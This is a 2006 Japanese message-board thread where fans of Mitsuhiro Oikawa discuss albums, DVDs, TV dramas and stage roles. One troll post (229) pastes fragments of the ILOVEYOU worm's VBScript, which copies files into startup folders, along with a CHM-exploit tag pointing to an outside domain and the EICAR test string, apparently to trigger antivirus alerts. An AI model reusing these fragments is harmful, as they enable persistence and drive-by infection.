武道館DVDまでのお楽しみにしとけ〜

139 :NO MUSIC NO NAME:2006/06/15(木) 23:04:01 ID:fD8Yr2xb
>>132
それは… 曲の解釈が、キミと僕とでは違うな・・・

140 :NO MUSIC NO NAME:2006/06/15(木) 23:06:12 ID:Ww4F2Kez
DVD買ったら分かるの?
武道館行ったけど何か言ってたっけ

141 :NO MUSIC NO NAME:2006/06/16(金) 07:04:40 ID:rawv0lNm
一昨日ミチーを成田で見たと50代伯母の目撃あり。

142 :NO MUSIC NO NAME:2006/06/16(金) 08:38:36 ID:ncTOETOG
伯母さんウラヤマ。ミチー&ベイベにとって素敵な旅行になりますように。ミチーが夜ぐっすり眠れますように。

143 :NO MUSIC NO NAME:2006/06/16(金) 20:52:56 ID:0PnKnVDE
ミチ−どっかに旅行?

144 :NO MUSIC NO NAME:2006/06/16(金) 20:55:28 ID:rEzf9QKM
>>143
本気で言ってんのか?
あほ、ばか、恥知らず、消えろ

145 :NO MUSIC NO NAME:2006/06/16(金) 21:21:55 ID:B/SFespD
>144
これこれ、もちつけw

146 :NO MUSIC NO NAME:2006/06/16(金) 21:52:38 ID:f5BwCYTT
質問ですみません。ベストの月下美人と流星の月下美人とでは音は全然違いますか?

147 :NO MUSIC NO NAME:2006/06/16(金) 22:10:22 ID:ZV1MjZew
>>143
ファンクラブイベントでローマらしいよ。

>>146
リマスタリングしてるだろうけど、耳のいい人なら違いに気付く程度かと。
と、ベスト盤買ってないのに答えてみるw

148 :NO MUSIC NO NAME:2006/06/16(金) 22:47:47 ID:f5BwCYTT
そうですか。全く違うというわけではないのですね。購入を考えます。ありがとうございました。

149 :NO MUSIC NO NAME:2006/06/17(土) 00:24:49 ID:86FeliWf
光博は選曲がいいね

150 :NO MUSIC NO NAME:2006/06/17(土) 22:22:04 ID:gQ9C46Zr
>>144
ミチ−ファンなのに、バカ、アホなどと罵声を浴びせるのは、いかがなものでしょう。
そういう奴は、ミチ−ファンであって欲しくないなぁ。
やっぱり、優しさが大切じゃん。いい女は、人を卑下しちゃいかんよ!

151 :NO MUSIC NO NAME:2006/06/17(土) 22:59:09 ID:MUVWrWDe
人を卑下って・・・ 辞書引いてくれ。

152 :NO MUSIC NO NAME:2006/06/18(日) 01:05:24 ID:QNPztOyI
その後 >>150の姿を見た者はなかった・・・

153 :NO MUSIC NO NAME:2006/06/18(日) 01:50:44 ID:bDSewNxd
>>150のミチ−の「−」がムズムズする

154 :NO MUSIC NO NAME:2006/06/18(日) 03:28:32 ID:ehouf3++
SO GOOD 注ぐ〜

155 :NO MUSIC NO NAME:2006/06/18(日) 05:53:46 ID:xT5+x0vI
>>153
よく気付いたねwwwwwwwwww

156 :NO MUSIC NO NAME:2006/06/18(日) 23:48:53 ID:s9M4xSM0
初心者ベイベーですはじめましてー。
今さらながらにミッチーのcdやら集めようと思ってるんですが、
利家とまつは買いなの?
何話から出てるのかしら?
ご存知のお方ご教授ください〜

157 :NO MUSIC NO NAME:2006/06/18(日) 23:59:55 ID:En75Uglf
>>156
DVDを揃えるよりもスカパーに加入して「利家とまつ」を録画するのがお勧めです
ちょうど昨日からまた放送始まったし。

スカパーチューナーは5000円程度で買えるしその他ミチーが出てるドラマもたまにやるし
今ならランキング番組で「やな家」のPVがフルで流れてるしさ。


158 :NO MUSIC NO NAME:2006/06/19(月) 00:30:51 ID:4Sf5Sbe3
>>156
俳優ミチーがお好きなのかな?
私としてはまずはCDとDVDをオススメしたい
ドラマ関係では私はマンハッタンラブストーリが好きです

159 :NO MUSIC NO NAME:2006/06/19(月) 00:39:27 ID:RX72H5D4
ドラマなら「晴れ着ここ一番」が一番すきだー。
赤西くんのおかげで、夏にDVD出るよ。オススメ。

160 :NO MUSIC NO NAME:2006/06/19(月) 10:05:31 ID:BMtyEpcf
利まつ、たしか17話からだったと思う。

161 :NO MUSIC NO NAME:2006/06/19(月) 23:28:20 ID:URKQCl6r
光博DVD、ちょっとキモクナイ?
いや、大好きなんですけどね・・・


162 :NO MUSIC NO NAME:2006/06/19(月) 23:47:15 ID:9MoaslSv
>>157->>160
おおー、レスたくさん・・・
そうですねー俳優ミッチーが好きかも・・・。邦楽は全然聴かないのですが、
ミッチーは以前から気になる存在でした。
富豪刑事EDの「美しいじんせいにょ〜♪限りないよろこびにょ〜ん♪」で
思わず笑えてしまうんですけど。
前田慶次郎役は特に前田慶次郎自体も好き+コスプレ好きもあいまって、
DVD買ってもいいなあーと。
これから色々揃えていきたいと思います。有難うございました。

163 :NO MUSIC NO NAME:2006/06/20(火) 00:34:50 ID:v7EPx0qA
そんな俺も初心者ベイべーなんですけど
死んでもいいだけを聞きたいが為に「光」 買ったけど。他の曲意外と良かったので「博」も買ったんだけど良かったよ〜
何で今までリアルタイムで聞いてなかったんだー と悔やむ。

164 :NO MUSIC NO NAME:2006/06/20(火) 02:51:06 ID:S/4Gsh1U
吾輩に釣られて光博買っちゃったオイラが来ましたよ。
ちょwミッチーwww…かっこいい!!目の前でうたわれたら失神だわな。
デビュー10年なわけだが、ミッチーの歌をきいたのは吾輩と富豪の主題歌だけだったんでね。いい意味でびっくりした。

歌詞カードの写真も新鮮だったね。風呂上がりっぽいのから普通に格好いいのまで。


165 :NO MUSIC NO NAME:2006/06/20(火) 06:27:28 ID:5U86Syxh
そんなおまいらにトドメを。
http://www.youtube.com/watch?v=naVduGOspyM


166 :NO MUSIC NO NAME:2006/06/20(火) 07:55:47 ID:eUDNKY2s
>>165
失神した。

167 :NO MUSIC NO NAME:2006/06/20(火) 09:02:00 ID:tbA0E4p8
吾輩からベスト買って音楽に興味もってくれた人って多いのかなー

なんか嬉しいぞオイ

168 :NO MUSIC NO NAME:2006/06/20(火) 19:50:03 ID:hrqmwQWO
風呂上がりが笑いのツボ。そんな風に思ったことなかった。
ベスト以外にも個性的で良い曲たくさんあるので、
よろしければ是非!

169 :NO MUSIC NO NAME:2006/06/20(火) 23:11:02 ID:RIbwq37B
>>165ひたすらかっこよす

決して下品にならないエロスというか・・・
ミッチーってなんかそういうのがありますね。
ダンスもうまいなー。


170 :NO MUSIC NO NAME:2006/06/21(水) 06:09:55 ID:5vVRtxEk
>>165
マジックにかかりました。

171 :NO MUSIC NO NAME:2006/06/21(水) 08:18:26 ID:y2uv7meI
>>157
うちスカパー入ってるのに、私はほとんどTV見ないんでノーチェックだったよ…
おかげで「やな家」のPVフルで見れたよ!笑えた。でもたかしイイ。
あのかつらで「ナンセンス」って…

172 :NO MUSIC NO NAME:2006/06/21(水) 23:39:38 ID:8OK+4D9S
>>156
利まつの慶次郎は又兵衛とのコンビが大好きだv
銃に撃たれた後のシーンとか「まつに言うw」とかその他モロモロお気に入りシーン満載です。

173 :NO MUSIC NO NAME:2006/06/22(木) 03:17:44 ID:tkRh6vz2
自分も自分も。舞踏館ではまった初心者ベイベーです。
CD等、集めたいんですけど初期のアルバムはもう廃盤なんでしょうか?
ネット通販でも売り切れですし。新品ないのかな。

せっかく興味持っても買えないなんて・・・orz

174 :NO MUSIC NO NAME:2006/06/22(木) 07:27:03 ID:GVGzLvxu
さんざん既出のベスト盤「光」と「博」
初期アルバムは、オクで定価程度で入手可

175 :NO MUSIC NO NAME:2006/06/22(木) 09:14:20 ID:1ZL9gaPm
もし行けるなら、新宿のルミネ1の新星堂に行ってみるといい。
自称「日本一ミッチーを贔屓する店」ですw
今市場に出回っているCD、DVDなら全てあると思う。
最近よく見てないけど、初期のアルバムまだ置いてたかな。
ライブ会場ではどうだったろう・・・

176 :NO MUSIC NO NAME:2006/06/22(木) 12:27:11 ID:c/2t9miP
>>173
ブック○フとか中古屋にある時もあるし、ヤフオクやファンサイトの譲渡板
もあるからまめにチェックするといいよ。
ファンサイトの譲渡板なら自分から「譲って下さい」も書けるしね。
ねこ○さんの所とかいいよ。

177 :NO MUSIC NO NAME:2006/06/22(木) 13:39:23 ID:4RkFS2dy
ブοクオフで入手したアルバムにキラキラしたまあるいシールがはいっていて嬉しかったっけ

178 :NO MUSIC NO NAME:2006/06/22(木) 13:45:31 ID:mg1L5hEc
あぁ二律背反のね何についてたんだか忘れちゃった

179 :NO MUSIC NO NAME:2006/06/22(木) 14:14:19 ID:kfoBh0eL
欲望図鑑だったような。

180 :NO MUSIC NO NAME:2006/06/22(木) 14:18:29 ID:8KKFglWE
ここしばらくミッチーの出番が少ないな。
コンサートで忙しかったころなのかな?

181 :NO MUSIC NO NAME:2006/06/22(木) 17:39:54 ID:BEdKa4Uz
欲望図鑑。当時各ショップ毎に特典付けてて(タワレコだとブロマイド)、
欲望図鑑の時は2枚買ってあって1枚はそのまま未開封で売った事がある。
1800円位だった。(買取値)ちなみに発売直後。


182 :NO MUSIC NO NAME:2006/06/23(金) 14:08:42 ID:/geV4WGQ
ここ読んで早速○ックオフ行って、「理想論」ゲトしてきますた。情報ありがとうございました。
なにこの個性的wなんか一人芝居みたいなのも入ってるしw「光」「博」に入ってるのと同じ曲もアレンジや発声?が違ってて別物になってた。ラップ?もあった。けっこう楽しめたよ。

もしかしてヘンペイ足か?とか意外と二の腕プヨプヨとか余計な所まで見てしまいました。
(*´Д`)手が・・手が・・エロい。

183 :NO MUSIC NO NAME:2006/06/23(金) 16:34:24 ID:+VLGsHI9
182タソ 鋭い!
偏平足です

184 :NO MUSIC NO NAME:2006/06/23(金) 17:10:37 ID:ZbHKR6V9
>173でつ。
皆様、情報ありがとうございます。早速探してみます。
ミッチーを贔屓する店、いってみますー。

185 :NO MUSIC NO NAME:2006/06/23(金) 17:15:14 ID:MQ10pHQ/
昔はね一人芝居が入るのが恒例だったんだよね。
ライブでもOPは寸劇だったし。
今は亡き蘭ちゃんも入ってるし、良かったね182タンv

声、やっぱり違ってるよね。自分密かに思ってたので。
ラップ…?ラップてそんなのあったか?
血管と白夜の事?これはあともう1つ別バージョンもあるよ。欲望図鑑にだっけ?


186 :NO MUSIC NO NAME:2006/06/23(金) 17:39:30 ID:R0cS29+h
>>185
♪大脳生理学的な見地から〜(ワルイコトシタイ) じゃないか? 


昔は一人芝居が入ってるのが恒例で、しばらくなくなってたけど
ヒカリモノでは久々に寸劇やってるよー かなりクオリティ高いから
いろいろ物色して追いついたら聞いてみて >>182

扁平足については本人も気にしてるのでそっとしといてあげましょう…w

187 :NO MUSIC NO NAME:2006/06/23(金) 17:46:08 ID:TNVXdWde
ご新規さんが増えて嬉しいね。

発声は変わったね。
本人が言うには、ライブをこなしていくうちに肺や喉が広がって声が出るようになってきたらしい。
CDでも違いはわかるけど、生だともっと違うよ。
ミチーの魅力は、なんといっても生! 上手いとか下手とか超えたものがあります。
ライブDVDを観て少しでもいいと思えたら、ライブへも是非どうぞ。
次の予定は未定だけど、例年からいって年末か来春までにはあるんじゃないかなーと。

188 :NO MUSIC NO NAME:2006/06/23(金) 17:53:09 ID:1wZwEHP2
>上手いとか下手とか超えたものがあります
…言い得て妙ですな

今日昼久しぶりに本家君薔薇聴いた。
カバーの選曲だけはやはりよく考えられたほうがいいと思います。

189 :NO MUSIC NO NAME:2006/06/23(金) 22:02:50 ID:ORiQMNNX
昼ドラ効果って凄いね。マツキヨの時みたいだ。

確かに昔「生もの(物)ー!!」て叫ばれたベイベーがいた様に、ミチー自身も
”ミチーは生。生が一番”て言ってたしね。
私はこの人のライブを見てから他の人のを見に行っても、それでは満足できない体になったよ。


190 :NO MUSIC NO NAME:2006/06/23(金) 22:05:58 ID:/wRAkMdE
>>189
わかるなー。
ミチー以外に好きな音楽は数あれど
自分にとってはミチーがマザーシップだわ。

191 :NO MUSIC NO NAME:2006/06/23(金) 23:36:35 ID:4++5vDv7
昼ドラ昨日初めて観ましたー。
赤パジャマミチーやら裸ミチーやらジャージミチーやら
色々みれて面白かったです。
DVDは買いですね。

192 :NO MUSIC NO NAME:2006/06/24(土) 15:46:20 ID:IdFygdm/
私も吾輩を見て及川さんにはまった一人です。
CD,DVDは一通り見ました。
どうしてもっと前に好きにならなかったんだろうと思います。
今度は及川さんが影響を受けた物をたどっていきたいです。
お勧めの映画、音楽とかありますか?



193 :NO MUSIC NO NAME:2006/06/24(土) 16:34:19 ID:cfzrh3dX
>>192
かなり急ピッチだね〜大人買い!でも嬉しい

音楽はやっぱりプリンス筆頭かな
でも郷80年代アイドルにもかなり影響受けてる
あと岡村ちゃんやムーンライダース
音楽友達ならシカオちゃん、キヨタン(清志郎)
美輪さまはどのカテゴリーに入れたらいいんだろう…

映画だったらスターウォーズ大好きよ
出るの夢だったけどその夢はあっけなく砕けちったw
あとガンダム大好き
蒲田行進曲の話もよく出てくるかな
ジョニーデップも好きで吹き替えしたいとよく言ってるw

哲学ならニーチェ(これは写真詩集「続・欲望図鑑」参照)

みちー自身が語るものが多すぎて…今ざっと思いついたのでこれだけです

ところで>>192さんはみちーが出演した映画はもう見た?


194 :NO MUSIC NO NAME:2006/06/24(土) 21:17:12 ID:8yg9mrTF
>>193
さっそくありがとうございます。
見たこと聴いたことない物は片っ端から借りてこようと思います。
出演作品もまだ見たことないのでこちらも見なきゃですね。


195 :NO MUSIC NO NAME:2006/06/24(土) 21:56:52 ID:lpVPERjJ
私も一人ミッチー祭り中w
今日も獲物を探して街を徘徊
ネットしまくりCD聞きまくりDVD見まくりでした
疲れた やっぱり密林で買い物が一番楽ですねw

196 :NO MUSIC NO NAME:2006/06/24(土) 21:58:01 ID:LiFOMQI5
後、ティムバートンってかナイトメア好きだよね
理想の紳士がジャックだとかそんな話を昔してた気がする

197 :NO MUSIC NO NAME:2006/06/24(土) 22:02:56 ID:YvTUbLel
なんか、いいなあ。
自分がはまった時を思い出す。やっぱり買いあさったよw

>>193タンに補足すると、
80年代アイドルは、まずトシちゃん。及川少年は彼を見て歌って踊る人になりたいと思ったとか。
ダンスもトシちゃんとマイケルの影響が大。
あとライブのMC中に何故かマッチや聖子ちゃんの歌が出てくることがしばしば。

映画は、最近は「ムーランルージュ」を挙げることが多いですね。
洋画が多いようです。

本は、日本文学と少女マンガw
三島が1番よく言うかな。「仮面の告白」とか。あと何と言っても「ベルばら」。
他に、村上春樹、谷崎潤一郎、夏目漱石「こころ」、向田邦子、
キャンディ・キャンディ、エヴァ、NANA、ハチクロ、なんかがよく言うかな。
この間、女子はこれを読んどけって言ったのは、安野モヨコ「働きマン」

198 :NO MUSIC NO NAME:2006/06/24(土) 23:55:01 ID:WLCSpN+4
「だめんずうぉーかー」もよく出てくるかな?
あと「すごいよマサルさん」w確かにみちーとマサルさんって似てるんだ。
この前の大阪では最近読んでる少女漫画として「のだめカンタービレ」も挙げてたよ。
例のごとく、もうすこし若かったら千秋の役ができたのに〜って悔しがってたw
そのとき「日出る処の天子」の話もしてたような…って漫画ばっかりだな。

影響というかわからないけど郷ひろみやジュリーのカバーもしてるよね。
ジュリーのカバーは個人的に好き。
歌はカバーしないけど、モノマネするのは西城秀樹ww

199 :NO MUSIC NO NAME:2006/06/24(土) 23:59:35 ID:GwLYrKHB
YAZAWAも忘れるな!

200 :NO MUSIC NO NAME:2006/06/25(日) 00:29:51 ID:EU3EgEAj
>>199
そこまで言ったら初心者タンが混乱するからw

201 :NO MUSIC NO NAME:2006/06/25(日) 00:44:16 ID:VGudUFCZ
もう十分混乱してるんじゃなかろーか
YAZAWAは舞踏館DVDでもしかしたらわかるかもしれん

初心者さんたち
要するにミチーって男はヲタなんです

202 :NO MUSIC NO NAME:2006/06/25(日) 10:13:08 ID:esfbaWol
ttp://tv.msn.co.jp/news/01.htm
流れるかも知れないので転載しときます。
TVニュース
及川光博が昼ドラで新イメージに挑戦中!
2006年6月20日

 歌手デビュー10周年を迎えた及川光博が、TBS系の昼帯ドラマ「吾輩
は主婦である」で、夏目漱石が乗り移ってしまった妻・みどり(斉藤由貴)
を相手に右往左往する夫・たかしをコミカルに演じている。

「みどりだけでなく、母親のちよこ(竹下景子)もお向かいのやす子(池津
祥子)も変わり者……現場は笑いが絶えないけど、僕はツッコミ疲れし
てます(苦笑)」

 初の昼帯ドラマで、しかもコメディー。ハードな収録スケジュールの中、
テンションを保つのは大変なことだが、及川は笑顔を見せる。「宮藤(官
九郎)さんの台本は、言葉のチョイスは新鮮だし、やり取りも面白くて、
疲れなんて吹き飛ぶ。それに、竹下さんは僕の母と雰囲気が似ていて、
掛け合いがすごく楽しい。コメディーは空気とテンポが大事だから、誰も
手を抜きません。人を笑わせるのは難しいといわれますが、それを実感
しています」

 初めての父親役だったが、子役の2人と日々接し、積極的に話すこと
で父性も芽生えた。

「おいしい物を食べた時に、子供たちにも食べさせたいと思ったり、僕は
子供が好きだったのだと発見できました。でも、何よりうれしかったのは、
みどりの妄想のシーンで夫婦で強盗に入った時、生まれて初めて頭に
ストッキングをかぶったことかな」 昼帯ドラマの常識を覆そうとの狙いで
企画されたこのドラマは、ミッチーの王子様イメージを覆す代表作にもな
りそうだ。

●TBS系(月〜金)後1・00〜1・30


203 :NO MUSIC NO NAME:2006/06/25(日) 10:52:25 ID:sQo01rSR
ミッチーの女性の好みを知りたいですわw

204 :NO MUSIC NO NAME:2006/06/25(日) 11:48:25 ID:suMsXyEa
かなーり前には、河合奈保子とか言ってたなw
最近はニコールキッドマンとか、滝川クリステルとか。
脚フェチ公言してるよ。

205 :NO MUSIC NO NAME:2006/06/25(日) 17:12:15 ID:jXUDW5jt
長いこと言ってたのは永作だね

206 :NO MUSIC NO NAME:2006/06/25(日) 19:37:21 ID:Pf1kxxcE
永作って気持ち悪くね?
安達ユミみたいで

207 :NO MUSIC NO NAME:2006/06/25(日) 19:59:04 ID:KXvKFx4P
それはスレ違い

208 :NO MUSIC NO NAME:2006/06/25(日) 20:15:41 ID:BgwgNKOU
ふんわりした感じの色白の子が好き、みたいな事言ってたことがあった気がする。
しかし、ニコールじゃ向こうのが生で背が高いぞw178センチ。

209 :NO MUSIC NO NAME:2006/06/25(日) 21:11:20 ID:JYBwXqcZ
松雪さんをもう少しふっくらとかも言ってた
あと一回雑誌でともさかってのも見た


210 :NO MUSIC NO NAME:2006/06/25(日) 21:20:53 ID:YTUxjjku
ともさか??初耳。友達だよね?

211 :NO MUSIC NO NAME:2006/06/26(月) 20:58:25 ID:7ZFEAajQ
あとミチー自身が読んでたとか言ってたわけではないけど世界観が合うと思うのが江戸川乱歩。
「猛獣VS一寸法師」という映画にも出てるし。(運転手役)
自分も含めて読者からやってほしいと言われてるのが京極夏彦で「魍魎の箱」の久保竣公。


212 :NO MUSIC NO NAME:2006/06/26(月) 21:33:47 ID:lYyohUFn
お正月にやった金田一「女王蜂」もよかった。
乱歩は絶対合う、ぜひ妖しい雰囲気のドラマか映画で使って欲しい。
「毛皮のマリー」はいつの日か映像化されるだろうか。
ビデオは撮ってあるらしいんだよね…

あぁ邦楽スレの趣旨から大幅にずれてるな

213 :NO MUSIC NO NAME:2006/06/26(月) 21:43:05 ID:G0U4zLf5
>>211
久保役、似合いそうですね〜。是非みてみたい!
ただ肝心の京極堂が・・・w
あと「李欧」の李欧役もやって欲しい・・・

ミッチーとは漫画の趣味は合いそうで嬉しい。
いい意味で俗っぽいところがあるんですね。
なんかほっとしました。



214 :NO MUSIC NO NAME:2006/06/27(火) 12:46:22 ID:IcrSfCcy
>>212
パルコの舞台のアンケートにいつも書いてリクエストはしてるんだけどね。
毛皮のマリーの映像化。

晴れここみたいにいつか出される日が来ないかなぁ…。


215 :NO MUSIC NO NAME:2006/06/27(火) 13:33:06 ID:QQUj8TQa
でもマリーって一部放送禁止部分があるので無理なんじゃないかなぁ?
放送しなければいいのかな?

216 :NO MUSIC NO NAME:2006/06/27(火) 15:03:10 ID:ABs/Sj00
放送禁止部分って?
ちなみにミッチーの前のキャストのマリーは、
発売されてないけどテレビでは放送されてる。

217 :NO MUSIC NO NAME:2006/06/28(水) 03:49:12 ID:Gbw1cPMT
よいとまけの歌って今でも放送禁止でしょ?
テレビ放送時はそこだけカットしてんの?

218 :NO MUSIC NO NAME:2006/06/28(水) 04:18:26 ID:fYlQDavM
ヨイトマケの歌は、NHKでも民放でも最近でも歌われてるがヤバイ部分は
歌詞を入れ替えて歌ってるのかな?

219 :NO MUSIC NO NAME:2006/06/28(水) 10:51:53 ID:0cwajfCr
諸事情でしばらくみちーから遠ざかっていたけど昨日久々に「うたかた。」DVDみました。
君がいなくてもー展望デッキーベストフレンドの流れが最高だった。泣いてしまった。
みちーは歌唱力はそんなにないかもしれないけど表現力はやっぱりすばらしいものがあるね。
早く舞踏館DVDが見たい。

220 :NO MUSIC NO NAME:2006/06/28(水) 23:20:59 ID:luI2xxS9
えっと…
マリーのお芝居中にヨイトマケの歌唱シーンは無いと思うけどな?
>>216-218で話題がねじれてるよー

221 :NO MUSIC NO NAME:2006/06/28(水) 23:24:53 ID:RFo2Mnjg
>220
ヨイトマケだってTVで歌われてるんだから、マリーが放映されたって
いいんじゃないか?って話でしょ。


222 :NO MUSIC NO NAME:2006/06/28(水) 23:32:02 ID:OJvCYLFA
>>220-221
オマエらはマリー観てないのか?それとも痴呆が始まってんのか?
どっちにしろ黙ってろ!
ヨイトマケはバックで流れてるんだよ

223 :NO MUSIC NO NAME:2006/06/29(木) 04:50:45 ID:DZXF3rPJ
当時は、何れBSか教育TVでやるかなと?思ったりもしたけど結局流れず終いでしたね。
「毛皮のマリー」VTRが撮ってあるならDVD化して欲しいけれど関係者用の記録のために
撮ってた場合販売用にならない撮り方だったのかも?

224 :NO MUSIC NO NAME:2006/06/29(木) 11:59:56 ID:TkKJtu4N
マリーのビデオ撮りの件はミチー自身が流星の中で語ってたよね。
「美輪明宏全集」みたいなのが出ることがあれば、
きっとミチー版マリーが入るとは思うけど。
師弟愛もそうだけど、美輪さん自身があの時のマリーに思い入れが強いから。

225 :NO MUSIC NO NAME:2006/06/29(木) 21:08:14 ID:XkdOlW5B
そういえばそうだね。
ミチーの前のマリー(石田欣也の時)は、演出家が外人さんで
解釈が美輪さまとは違ってたんだったね。

226 :NO MUSIC NO NAME:2006/06/29(木) 21:24:02 ID:eS1qr9V4
>>225
石田欣也のマリー観たけど、演出がなんというかエキセントリックだった感じが。
私的にはミチー欣也のマリーの方が好きだ。
内容がああいった感じだから、前衛的な演出よりオーソドックスなほうがいいな。

ミチー欣也のマリーで水夫役やってらした俳優さん、素敵だったな〜。

って板違いでごめん。

227 :NO MUSIC NO NAME:2006/06/30(金) 01:04:59 ID:CKujTjgq
>226
私もそう思ったよー!>素敵

228 :NO MUSIC NO NAME:2006/06/30(金) 20:47:51 ID:Wt6JOSZQ
菊池隆則さんだよね。
今年の美輪さんのお芝居(愛の賛歌)にも出演してらして、
ボクサー役だったよ。

229 :NO MUSIC NO NAME:2006/07/02(日) 14:04:57 ID:zaToGzjH
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

230 :NO MUSIC NO NAME:2006/07/02(日) 18:46:28 ID:1J3skl2p
おぉ〜。
こんな過疎ってるスレにもウィルス荒らしがっ。

ノートン先生なら反応するんだっけか?オイラは平気だったけど。

231 :NO MUSIC NO NAME:2006/07/02(日) 19:03:35 ID:8S6ksFrn
うん、反応しまくり。
初めはウィルスかと焦って削除以来スレの申請のしかたとか調べたんだけど、
該当スレで削除人さんが「ノートントラップ」って書いてたんで
一安心したところだよw

232 :NO MUSIC NO NAME:2006/07/03(月) 14:29:21 ID:nMfDpBMi
オマチカネのお返事、更新されてましたよ。

233 :NO MUSIC NO NAME:2006/07/04(火) 13:06:17 ID:PaIgovLF
age

234 :NO MUSIC NO NAME:2006/07/04(火) 13:06:51 ID:xtV8bKoQ
ageage

235 :NO MUSIC NO NAME:2006/07/04(火) 13:07:31 ID:xtV8bKoQ
>>234
あがってねぇしw

236 :NO MUSIC NO NAME:2006/07/04(火) 13:08:17 ID:PaIgovLF
自作自演完了!

237 :NO MUSIC NO NAME:2006/07/05(水) 22:11:07 ID:fB7r6arO
噂板はどこが本スレなのか?

238 :NO MUSIC NO NAME:2006/07/05(水) 23:42:47 ID:UpU/M1Yy
噂板の本スレ

及川光博の噂138〜ミチーとベイベはご飯と味噌汁〜
http://human5.2ch.net/test/read.cgi/uwasa/1151771049/

他は全て削除依頼済みです。



239 :NO MUSIC NO NAME:2006/07/08(土) 22:31:17 ID:ZDPD2cZQ
mellowheadのアルバムに参加しているミッチーの曲聴きました。
かなりかっこよくってビックリした。
ああいう歌も歌えるんだね。

240 :NO MUSIC NO NAME:2006/07/09(日) 10:16:08 ID:LXZDR1iN
英語の発音が微妙によいでせう?

241 :NO MUSIC NO NAME:2006/07/10(月) 20:57:38 ID:wrCx2aZN
>>240
エフェクトかかりすぎて発音はわかりにくいけど
たどたどしさやカタカナ丸出しではなかったね。
というか自身のアルバムをいくつか聞かせてもらったが
そこでやってる音楽よりこういう方が雰囲気あってるんじゃないかと思った。
真逆のアイドルちっくなナンバーはそれはそれでありだと思うけど。

真剣なヲタじゃないんで全部聞いたわけじゃないんで偉そうなことは言えませんが。

242 :NO MUSIC NO NAME:2006/07/13(木) 10:50:47 ID:3Rw0LZWM
「ロリータの罠」の「逃げろ」が「煮ゲロ」に聞こえてしまいますた。二日酔いな私です。

「欲望図鑑」いいですね!「懺悔」と「S.D.R.」が特にお気に入りです。

243 :NO MUSIC NO NAME:2006/07/14(金) 16:47:00 ID:frYCjQJZ
吾輩終わらないでぇぇぇ〜!!!

244 :NO MUSIC NO NAME:2006/07/14(金) 20:33:01 ID:a415qGRF
あのOPが見れないと思うと寂しいぜ

245 :NO MUSIC NO NAME:2006/07/15(土) 07:47:59 ID:uYTGOWgZ
>>244
CD買えよ、貧民。

246 :NO MUSIC NO NAME:2006/07/15(土) 13:44:12 ID:kL0tHYqn
244じゃないけど
♪おかゆになりたい〜〜〜

バージョンはOPのみだし。
録画は見れても新しい♪おかゆになりたい〜〜 はもう見られない。やっぱり寂しい。

247 :NO MUSIC NO NAME:2006/07/15(土) 16:08:33 ID:tjkDx7+o
>>246
え?うちのシングルについてたDVDにはしっかり「♪おかゆになりたい〜〜〜」って入ってるよ?
君が買ったのは朝鮮半島の海賊版じゃないの?

248 :NO MUSIC NO NAME:2006/07/15(土) 18:29:52 ID:SsyU9gHi
>>247は音程拾えないのか

249 :NO MUSIC NO NAME:2006/07/16(日) 00:24:04 ID:ZjlsBzmc
音程じゃなくて拍数か?

250 :NO MUSIC NO NAME:2006/07/16(日) 01:02:37 ID:GQpFOMCC
吾輩、とっても良かったです。

251 :三橋美智也:2006/07/16(日) 04:41:30 ID:/cv0vwz/
我輩、良かったですよねぇ(^^)

252 :渡辺美智雄:2006/07/16(日) 07:09:48 ID:ASutf7EQ
吾輩最高!

253 :NO MUSIC NO NAME:2006/07/16(日) 18:20:46 ID:68fDG4vN
>>247
OPバージョンとシングルバージョンの違いも分からずに偉そうに書くなよ
しかも低俗な煽り入れてさ
恥ずかしい

254 :NO MUSIC NO NAME:2006/07/16(日) 18:51:02 ID:f0URgMTX
貧民の逆切れかよ、やれやれ
怖い怖い

255 :NO MUSIC NO NAME:2006/07/16(日) 21:21:49 ID:RaEG1mEG
>>253
必死でつね(ププ

256 :NO MUSIC NO NAME:2006/07/16(日) 21:23:29 ID:eCTjgnAj
>>254
大正解です!!
やっぱり今回も瞬殺でしたね。
もしかして地元の方ですか?

257 :NO MUSIC NO NAME:2006/07/17(月) 14:40:42 ID:T13KIFO1
吾輩でミッチーに興味もったものです。
CDはなぜか「CRAZY A GO GO」のシングルだけ持ってる…。
いいよね、これ。

アルバムも聴いてみるよ。

258 :NO MUSIC NO NAME:2006/07/17(月) 18:30:25 ID:WT/ylQhg
>>257
アルバムにもいい曲がたくさんありますのでゼヒ聞いてみてください!
「CRAZY〜」は、最新のベストアルバム「博」に入ってるVer.(この世でオンリーワン!Ver.)もいいですよ!
ライブでやるときはいつもそのVer.です。大盛り上がりです!

259 :NO MUSIC NO NAME:2006/07/18(火) 02:20:56 ID:YiRhDoPk
>258
どうもありがとう。>257です。

CRAZY〜って別Verもあるんだね〜 ベスト聴いてみる!
ライブ行ってみたいけどポンポン持参しないと浮くだろうか。


260 :NO MUSIC NO NAME:2006/07/18(火) 14:44:52 ID:htvYtFqO
>>259
浮かないよ、大丈夫。
持ってない人もけっこういるから。
みんながみんな熱心なファンじゃないし、荷物の関係で持ってこれない人もいる。
もしかしたら隣のべいべがそっと貸してくれるかもしれない。
そんなときは拒否せずに借りてあげてくださいなw

あと今回のツアーでやったから次のツアーでは「死んでもいい」はやらないかも。

261 :NO MUSIC NO NAME:2006/07/18(火) 17:48:59 ID:p8JixpO9
9年ベイベしてるけど頑なにポンポン持ったことなかったけど
この前の武道館で始めて持ったよ

262 :NO MUSIC NO NAME:2006/07/18(火) 18:54:45 ID:o5E2EO6c
べいべ10年生だけど、私も武道館が初ポンポンだった。楽しかったなあ。
持参するのもよし、エアーポンポンで踊りまくるもよし。
要は、レッツ自己解放。

263 :NO MUSIC NO NAME:2006/07/18(火) 20:53:14 ID:uW4BbDmg
うん、持ってないからって浮くことはないよ。死んでもいい以外で振ってれば浮くだろうけど。

